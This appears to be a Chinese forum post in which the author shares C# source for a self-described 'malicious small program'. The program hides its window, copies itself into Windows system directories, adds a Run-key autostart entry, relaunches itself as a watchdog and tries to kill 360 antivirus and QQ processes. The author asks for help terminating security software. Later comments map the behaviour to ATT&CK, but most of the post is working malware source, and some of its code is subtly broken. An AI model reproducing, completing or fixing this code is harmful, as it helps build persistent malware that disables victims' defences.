写的恶意小软件,咋结束360进程?
思路如下:
1,自我复制。2,自我启动。3,进程守护。4,自动查杀。
只要能把所有杀毒软件的进程全干掉,余下的事就好办了,现在就卡在这一步了,郁闷,哪位大哥帮助下?先谢谢了。
代码如下:
//#define DEL
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
namespace explorer
{
/// <summary>
/// WinForms form posted by its author as a "malicious small program". The listing shows four
/// behaviours: self-copy into Windows directories, a per-user Run-key autostart entry,
/// termination of named processes (including security-product processes), and relaunching
/// a second instance of itself.
/// </summary>
/// <remarks>
/// Analyst notes (ATT&amp;CK mapping, based only on what this listing shows):
///  - The namespace (explorer) and class (svchost) reuse the names of legitimate Windows
///    binaries: T1036.005 (Masquerading: Match Legitimate Name or Location).
///  - The form is made invisible on load: T1564.003 (Hidden Window).
///  - HKCU\...\CurrentVersion\Run is written: T1547.001 (Registry Run Keys).
///  - Process.Kill() is called on security-product processes: T1562.001 (Impair Defenses).
/// Host artefacts visible in this listing: a file named "scv.log" in the first existing
/// directory of TargetDirectorys (or the working directory), copies of the executable in
/// those directories, and a new value under the HKCU Run key. File-creation, registry-value-set
/// and process-creation telemetry (for example Sysmon events 11, 13 and 1) cover these actions.
/// WriteLog, timKiller and InitializeComponent are defined outside this listing.
/// </remarks>
public partial class svchost : Form
{
// Full path of the running executable (Application.ExecutablePath).
string SourceFile;
// SourceFile with Application.StartupPath removed, upper-cased.
// NOTE(review): presumably keeps the leading path separator, since it is appended directly to directory paths - confirm.
string FileName;
// Candidate Windows/WinNT directories on C: and D: used as copy destinations and log locations.
string[] TargetDirectorys = new string[] { "c:/windows/system32", "c:/windows/system", "c:/windows", "c:/winnt", "c:/winnt/system",
"c:/winnt/system32", "d:/windows", "d:/windows/system", "d:/windows/system32", "d:/winnt" };
// Number of files copied (CopyMySelf) or deleted (DeleteAllFiles).
int FileCount;
// Snapshot of running processes taken by KillAndStartWatchProcess.
Process[] SysProcesses;
// Random source used by GetRandomPath.
Random Rand;
// Paths of the copies recorded by CopyMySelf.
List <string> UsablePath;
// FileName with path separators and ".EXE" removed; used as the Run value name and compared with process names.
string AppProcessName;
// Names of the processes this form tries to terminate (filled in explorer_Load).
List <string> KillProcessNames = new List <string>();
// Path of the activity log ("scv.log").
string LogFile = "";
/// <summary>Creates the form; only runs the designer-generated initialisation.</summary>
public svchost()
{
InitializeComponent();
}
/// <summary>
/// Load handler: hides the window, initialises state, chooses the log location and then runs
/// either the cleanup path (when DEL is defined) or the copy / autostart / process-kill / timer path.
/// Any exception is logged and the application exits.
/// </summary>
private void explorer_Load(object sender, EventArgs e)
{
try
{
// Initialisation. The window is made fully transparent, invisible and absent from the taskbar,
// so the user sees no UI for this process.
this.Opacity = 0;
this.Visible = false;
this.ShowInTaskbar = false;
SourceFile = Application.ExecutablePath;
FileName = SourceFile.Replace(Application.StartupPath, "").ToUpper();
FileCount = 0;
UsablePath = new List <string>();
AppProcessName = FileName.Replace("\\", "").Replace("/", "").Replace(".EXE", "");
Rand = new Random();
// Process names targeted for termination: a chat client and two security-product processes.
KillProcessNames.Add("QQ");
KillProcessNames.Add("360tray");
KillProcessNames.Add("360safe");
// The log goes into the first target directory that exists.
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
LogFile = TargetDirectorys[i] + "/scv.log";
break;
}
}
// Falls back to a relative "scv.log" when none of the target directories exists.
LogFile = (LogFile == "" ? "scv.log" : LogFile);
WriteLog("启动进程于 " + DateTime.Now.ToString());
#if DEL
// Cleanup build: removes the copies instead of creating them.
DeleteAllFiles();
#else
// 1. Self-copy into the Windows directories.
CopyMySelf();
// 2. Autostart.
/*
 * Author's note: the installed security product raises a prompt when this registry write
 * happens, and the author asks whether that prompt can be avoided.
 * Analyst note: the Run-key write is therefore already caught by behavioural monitoring.
 */
string firstPath = GetFirstPath();
if (firstPath != "")
{
SetAutoRun(AppProcessName, firstPath);
}
// 3. Terminate the listed processes and start a second instance so the two keep each other running.
KillAndStartWatchProcess();
// 4. Start the timer for periodic termination and process guarding (its Tick handler is not in this listing).
timKiller.Enabled = true;
timKiller.Start();
#endif
}
catch(Exception er)
{
try
{
WriteLog("系统发生错误于: " + DateTime.Now.ToString() + " 退出,错误信息: " + er.Message);
}
catch
{
// A failure while logging is ignored; the application exits either way.
}
finally
{
Application.Exit();
}
}
}
/// <summary>
/// 1. Self-copy: copies the running executable into every existing directory of TargetDirectorys
/// where it is not already present, records each destination in UsablePath and logs the total.
/// </summary>
private void CopyMySelf()
{
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
if (!File.Exists(TargetDirectorys[i] + FileName))
{
File.Copy(SourceFile, TargetDirectorys[i] + FileName);
WriteLog("复制文件 " + SourceFile + " 到 " + TargetDirectorys[i] + FileName);
FileCount++;
}
// The path is recorded whether the file was just copied or already existed.
UsablePath.Add(TargetDirectorys[i] + FileName);
}
}
WriteLog("共复制了 " + FileCount.ToString() + " 个文件! \r\n");
}
/// <summary>
/// 1-1. Cleanup (only called when DEL is defined): deletes the copies from the target directories,
/// clears UsablePath and deletes the log file before writing a final log line.
/// </summary>
private void DeleteAllFiles()
{
for (int i = 0; i < TargetDirectorys.Length; i++)
{
if (Directory.Exists(TargetDirectorys[i]))
{
if (File.Exists(TargetDirectorys[i] + FileName))
{
File.Delete(TargetDirectorys[i] + FileName);
WriteLog("删除文件 " + TargetDirectorys[i] + FileName);
FileCount++;
}
}
}
UsablePath.Clear();
File.Delete(LogFile);
WriteLog("共删除了 " + FileCount.ToString() + " 个文件!");
}
/// <summary>
/// 2. Autostart: opens HKCU\Software\Microsoft\Windows\CurrentVersion\Run for writing and, when
/// no existing entry is found by the check below, sets a value there.
/// </summary>
/// <param name="strKeyString">Name of the Run value to write.</param>
/// <param name="strKeyValue">Data of the Run value; the caller passes an executable path.</param>
private void SetAutoRun(string strKeyString, string strKeyValue)
{
int runKeysCount = 0;
// Per-user Run key: writable without administrative rights, executed at that user's logon.
RegistryKey runKey = Registry.CurrentUser.OpenSubKey("SoftWare\\Microsoft\\Windows\\CurrentVersion\\Run",true);
string[] runKeys = runKey.GetSubKeyNames();
for (int i = 0; i < runKeys.Length; i++)
{
if (runKeys[i].Trim().ToUpper() == FileName)
{
runKeysCount++;
break;
}
}
if (runKeysCount < 1)
{
runKey.SetValue(strKeyString, strKeyValue);
WriteLog("设置启动项: " + DateTime.Now.ToString());
}
}
/// <summary>Returns the path of a copy found in the target directories, or "" when none is found.</summary>
private string GetFirstPath()
{
for (int i = 0; i < TargetDirectorys[i].Length; i++)
{
if (File.Exists(TargetDirectorys[i] + FileName))
{
return TargetDirectorys[i] + FileName;
}
}
return "";
}
/// <summary>Returns a randomly chosen entry of UsablePath, its only entry, or "" when it is empty.</summary>
private string GetRandomPath()
{
if (UsablePath.Count > 1)
{
int r = Rand.Next(0, UsablePath.Count);
return UsablePath[r];
}
else if (UsablePath.Count == 1)
{
return UsablePath[0];
}
else
{
return "";
}
}
/// <summary>
/// 3. Enumerates running processes, counts those named like this application, calls Kill() on
/// processes looked up in KillProcessNames, and starts another copy of the executable when at
/// most one instance is running.
/// </summary>
private void KillAndStartWatchProcess()
{
SysProcesses = Process.GetProcesses();
int killProcessIndex = -1;
int existsProcessCount = 0;
for (int i = 0; i < SysProcesses.Length; i++)
{
if (SysProcesses[i].ProcessName == AppProcessName)
{
existsProcessCount++;
}
killProcessIndex = KillProcessNames.IndexOf(SysProcesses[i].ProcessName.ToUpper());
if (killProcessIndex != -1)
{
try
{
/*
 * Author's note: the attempt to terminate the security product's processes does not succeed.
 */
SysProcesses[i].Kill();
}
catch (Exception Er)
{
WriteLog("进程名 " + SysProcesses[i].Name.ToString() + " 查杀有误,错误信息:" + Er.Message);
}
WriteLog("扫描到进程于 " + DateTime.Now.ToString());
}
}
// Watchdog: with one instance or none running, a copy from UsablePath is launched.
if (existsProcessCount <= 1)
{
string appExecutePath = GetRandomPath();
if (appExecutePath != "")
{
Process.Start(appExecutePath);
WriteLog("启动守护进程: " + DateTime.Now.ToString() + " .\r\n----------------------------------------------------\r\n");
}
}
}
}
}